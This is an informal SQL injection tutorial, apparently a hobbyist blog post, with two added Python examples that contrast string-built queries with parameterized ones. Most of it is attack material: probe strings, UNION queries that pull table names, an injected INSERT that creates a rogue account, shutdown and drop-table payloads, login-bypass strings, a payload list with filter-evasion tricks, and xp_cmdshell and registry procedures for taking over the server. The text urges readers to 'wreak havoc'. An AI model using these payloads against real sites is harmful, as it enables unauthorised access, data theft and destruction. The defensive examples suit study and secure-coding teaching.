
SQL Injection – Full Disclosure

SQL Injection is a technique that exploits a vulnerability in the way a web application builds its database queries: user input is pasted into the SQL text, so an attacker can get SQL statements of his own choosing executed by the database using nothing more than a web browser.

Let's take a simple example: signing up for a mail account for the first time. What the user enters in the input boxes of the website is stored in a backend database. The next time the user logs in with username and password, the site compares the input with the data stored in the database; if both match, it grants access to that user and lets him proceed, otherwise it won't. So whatever a user types into an input box on a website is handed to the backend process. Attackers take advantage of this by typing SQL fragments into the input boxes, and if the site is vulnerable to SQL injection (that is, it glues the input into its query text instead of passing it as a parameter), the query runs with the attacker's SQL inside it and the site is compromised.

Here is the detailed information on how SQL injection works.

SQL stands for Structured Query Language (also pronounced "Sequel") and is the common language used by relational databases to manipulate the data stored in them. SQL queries are used to talk to a database interactively for any kind of manipulation: creating a new table, modifying, updating, deleting, dropping and so on.

A legitimate user gives his valid credentials in the login form of a website, whereas an attacker tries to put SQL fragments in the input box instead of credentials. The browser sends the request to the server, the server builds its query around the attacker's input, and the database executes it. Even so, nobody gets far into a server that is vulnerable to SQL injection without first working out the table names, the column names and at least some of the values stored in them; that reconnaissance is most of the work.
How to find out whether a site is vulnerable to SQL Injection?

"Blind Injection" is what this article calls the first step: submitting a few characters that break the syntax of the site's query, to find out whether it is vulnerable to SQL injection at all. (In current usage "blind SQL injection" means the database returns no error and results have to be inferred from the page's behaviour; the probes below are the error-based opening move in either case.)

The attacker starts by submitting a few probe strings in an input box, for example:

' - a single quote

" - a double quote

'1 - a single quote followed by 1

'a - a single quote followed by a

'; - a single quote followed by a semicolon

What will this do?

Well, if the page comes back with an error message generated by the database, the site is very likely vulnerable to SQL injection.

The error appears because the application pasted the input into its query text, so an unbalanced quote leaves the database with a statement it cannot parse. The error therefore shows two things: that user input reaches the query unescaped, and that the site displays raw database errors to its users instead of a generic error page. A single quote ' on its own is the probe that most often produces an error.
I got an error, what to do next?

Even a kid can generate an error like this!

Let's get our hands wet. The next step is to obtain the table names, the column names and the number of columns and tables; with those in hand the rest follows.

An example of an error produced by such a probe, here from an ASP application using ADO:

ADODB.Recordset error '800a0bb9'

Arguments are of the wrong type, are out of acceptable range, or are in
conflict with one another.

/admin/CheckLogin.asp, line 68

Some administrators also leave the default settings unchanged. In that case try the database's default credentials, for example the sa login with a blank or trivial password (old MS SQL Server installations shipped with sa and no password at all). Which defaults apply depends on the database product.

How to obtain more details?

Use trial and error here too, but keep it reasonable: learn what the error messages of the different databases look like and inject a statement that suits the database you have identified; it will give up more useful information. The error above, for instance, names an ADO component and an .asp file, which points at an ASP front end, typically backed by Microsoft Access or MS SQL Server, and the line number tells you roughly where in CheckLogin.asp the query is built.

Let me make one thing clear: SQL injection can be exploited in both ways, by injecting into the input boxes found on the site (login, search and so on, i.e. the POST data) and by injecting into the parameters of the URL (the GET data). Any value the application puts into a query is a potential injection point.

A database is bound to return an error if you supply a value of the wrong type, for example a letter where a numeric ID is expected: the query then contains something like ID = abc, which the database cannot resolve, and the error tells you the parameter is used unquoted inside the query.

Let's say the target URL looks like this:

www.vulnsite.com/refer.asp?ID=3&action=view

Try trial and error here too, just by changing the URL parameters, like so:

www.vulnsite.com/refer.asp?ID=0

www.vulnsite.com/refer.asp?ID=-1

www.vulnsite.com/refer.asp?ID=3&action=edit

www.vulnsite.com/refer.asp?ID=3&action=manage

www.vulnsite.com/refer.asp?ID=3&action=modify

and so on. (Note: this is still only probing. Out-of-range IDs such as 0 or -1 show how the page behaves when its query returns no row, which is useful later; the action= variants look for hidden functionality, which strictly speaking is parameter tampering rather than SQL injection, but it belongs to the same reconnaissance step.)

www.vulnsite.com/refer.asp?ID=30 union select top 1 table_name from information_schema.tables--

Everything up to ID=30 is the legitimate URL; the rest is injected SQL (MS SQL Server syntax: TOP 1 and the information_schema views) that appends the first table name from the victim's database to the page's own result. Two things have to hold for a UNION to work: the injected SELECT must return the same number of columns as the page's query, with compatible types, and the page must display at least one of those columns. If the server complains about the column count, pad the injected SELECT with NULL values until it matches. Let's say this got you the table name, users, and its columns.

www.vulnsite.com/refer.asp?ID=30 insert into users(id,username,password,info) values(100,'crawl','pass','')--

This creates a new user account in the database remotely. T-SQL accepts a second statement in the same batch even without a semicolon, and the column names are written bare (in single quotes they would be string literals and the statement would fail). It only succeeds if the application's database login has INSERT rights on the table, but then you can log in with the newly created account and do whatever you wish.

This is one of the ways, and there are several others.

There are also built-in statements and procedures that give attackers a wide-open way to shut down the SQL service or drop data remotely, without any further authentication: the injected statement runs with whatever rights the application's database login already has, so these only succeed where that login is over-privileged (SHUTDOWN, for example, needs the sysadmin or serveradmin role on MS SQL Server).

'; shutdown --

Can be used to shut down the SQL service remotely.

'; drop table users --

Used to drop tables from the database remotely.

Here is a common one that really did compromise most vulnerable sites in the past:

1 = 1 --

The attacker types this into an input box, preceded by a single quote that closes the string the application's query opened and an OR. The condition 1=1 is always true, since one always equals one, and -- starts a comment in SQL, so whatever comes after it (the rest of the original query, including its closing quote) is ignored. The WHERE clause of the login query is thereby satisfied for every row regardless of the credentials, and a login page that treats any returned row as a successful login lets the attacker straight in, where he can wreak havoc.
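The login flow the article describes (credentials glued into the query, then ' or 1=1-- or admin'-- to get in) as an added, runnable example beside the parameterized version that is not fooled; this is not code from the article. It uses Python's built-in sqlite3 module and a constructed members table; the function names and columns are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample database: a members table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO members (login, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, user, pwd):
    """The CheckLogin.asp pattern: credentials are glued into the SQL string.
    Returns ("ok", login) on a match, ("denied", None) on no match, and
    ("error", message) when the built query does not parse."""
    sql = f"SELECT login FROM members WHERE login = '{user}' AND password = '{pwd}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as e:
        return ("error", str(e))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(conn, user, pwd):
    """Fixed version: the query text is constant and the values travel as
    parameters, so a quote or a comment in the input is just data."""
    row = conn.execute("SELECT login FROM members WHERE login = ? AND password = ?",
                       (user, pwd)).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "'", "x"))                # the probe: a database error
    print(login_vulnerable(db, "nobody", "' or 1=1--"))  # ('ok', 'admin'): ... OR 1=1 matches every row
    print(login_vulnerable(db, "admin'--", "wrong"))     # ('ok', 'admin'): password check commented out
    print(login_safe(db, "nobody", "' or 1=1--"))        # ('denied', None)
    print(login_safe(db, "admin'--", "wrong"))           # ('denied', None)
```

Note that ' or 1=1-- logs the attacker in as admin, the first row in the table, without knowing any password at all, while admin'-- picks the account by name and simply comments the password check away. The sqlite3 driver's execute() refuses more than one statement per call, so the stacked-query payloads ('; drop table users --) fail here; the ADO/MS SQL stack in the article accepts such batches, which is why those payloads matter there.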
What you have seen so far were the familiar ones, but there are plenty more such payloads, and a selection is listed here. Note that the list mixes raw injection strings (what goes into the box or URL) with full SQL statements that show what the resulting query looks like on the server side, plus a few tricks for getting past keyword and whitespace filters:

admin' --

admin' #

admin'/*

1=1--

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

1' OR '1'='1

') or ('1'='1--

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0

SELECT login + '-' + password FROM members

SELECT login || '-' || password FROM members

SELECT CONCAT(login, password) FROM members

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members


DR/**/OP/*bypass blacklisting*/sampletable

SELECT/*avoid-spaces*/password/**/FROM/**/Members

SELECT /*!32302 1/0, */ 1 FROM tablename

SELECT * FROM products WHERE id = 10; DROP TABLE members--
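The DR/**/OP and /*avoid-spaces*/ entries in the list exist because some sites try to stop injection with a keyword or whitespace blacklist instead of fixing the query. This added example (not from the article; Python's built-in sqlite3 module with a constructed news/members schema, and the filter and function names are assumptions) shows such a filter, the comment-as-whitespace and nested-keyword bypass, and the parameterized query that needs no filter at all.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database: public news plus the members table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (header TEXT, txt TEXT);
        CREATE TABLE members (name TEXT, pass TEXT);
        INSERT INTO news VALUES ('Release', 'version 2 is out');
        INSERT INTO members VALUES ('admin', 'pa55');
    """)
    return conn


def naive_filter(q):
    """A blacklist of the kind the bypass payloads target: drop spaces and
    remove the word UNION (case-insensitive), one pass only."""
    q = q.replace(" ", "")
    return re.sub("union", "", q, flags=re.IGNORECASE)


def search_filtered(conn, q):
    """Search box that trusts the blacklist and still concatenates."""
    sql = f"SELECT header, txt FROM news WHERE header LIKE '%{naive_filter(q)}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, q):
    """Fixed version: parameterized, so no blacklist is needed."""
    return conn.execute("SELECT header, txt FROM news WHERE header LIKE ?",
                        ("%" + q + "%",)).fetchall()


# Constructed payload: /**/ stands in for the spaces the filter removes, and
# UNIunionON survives because the filter strips the inner 'union' and leaves UNION.
PAYLOAD = "x'/**/UNIunionON/**/SELECT/**/name,pass/**/FROM/**/members--"


if __name__ == "__main__":
    db = make_db()
    print(naive_filter(PAYLOAD))        # x'/**/UNION/**/SELECT/**/name,pass/**/FROM/**/members--
    print(search_filtered(db, PAYLOAD))  # [('admin', 'pa55')]
    print(search_safe(db, PAYLOAD))      # []: the payload is just a search string
    print(search_safe(db, "Rel"))        # [('Release', 'version 2 is out')]
```

After the filter the server runs SELECT header, txt FROM news WHERE header LIKE '%x' UNION SELECT name,pass FROM members, with the comments acting as whitespace and -- swallowing the trailing %'. Every blacklist has a gap of this kind; the parameterized query has none to find.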

What else can a hacker do with this?

If the site administrator is not aware of the extended stored procedures that ship with MS SQL Server, and access to them is not restricted, the attacker can take over the whole box.

Through xp_cmdshell an attacker can run operating-system commands remotely and even shut down the entire server, a Denial of Service (DoS). The catch: xp_cmdshell runs its commands under the SQL Server service account (or a configured proxy account), executing or enabling it needs sysadmin rights, and since SQL Server 2005 it is disabled by default and has to be switched on with sp_configure. Where the web application connects as sa or another sysadmin login, all of that is available to the injection.

Attackers can also read and write the registry, create a new administrator account remotely, turn the machine into a bot, and so on.

Here are a few:

sp_password -> Changes the password for a given login name (deprecated; ALTER LOGIN replaces it on newer versions).

e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Lists all the tables in the current database.

e.g. EXEC sp_tables

xp_msver -> Shows version and build information about the server.

e.g. EXEC master..xp_msver

xp_cmdshell -> Runs an arbitrary command on the machine, under the SQL Server service account.

e.g. EXEC master..xp_cmdshell 'dir' -> directory listing of the current working directory

e.g. EXEC master..xp_cmdshell 'net1 user' -> lists the local Windows accounts

xp_regaddmultistring - Adds a string to a multi-string registry value

xp_regdeletekey - Deletes a registry key

xp_regdeletevalue - Deletes a registry value

xp_regenumkeys - Enumerates the subkeys of a registry key

xp_regenumvalues - Enumerates the values under a registry key

xp_regread - Reads a registry value

xp_regremovemultistring - Removes a string from a multi-string registry value

xp_regwrite - Writes a registry value

xp_terminate_process - Terminates a process, given its PID

xp_availablemedia - Reveals the available drives on the box

xp_dirtree - Obtains a directory tree

xp_enumdsn - Enumerates the ODBC data sources on the server

xp_loginconfig - Reveals information about the server's login security mode

xp_makecab - Creates a compressed archive of files on the server

xp_ntsec_enumdomains - Enumerates the domains the server can access

There are a few SQL injection vulnerability assessment tools available on the internet free of cost, with which you can assess whether your own resource is vulnerable to SQL injection or not:

SQLBF - MS SQL Server password auditor

SQL Dict - MS SQL dictionary-based password cracker

SQL Smack - Used to execute remote commands

SQL Poke - SQL port scanner; connects as SA and executes commands
- Cybercrawler

www.technocrawler.co.cc
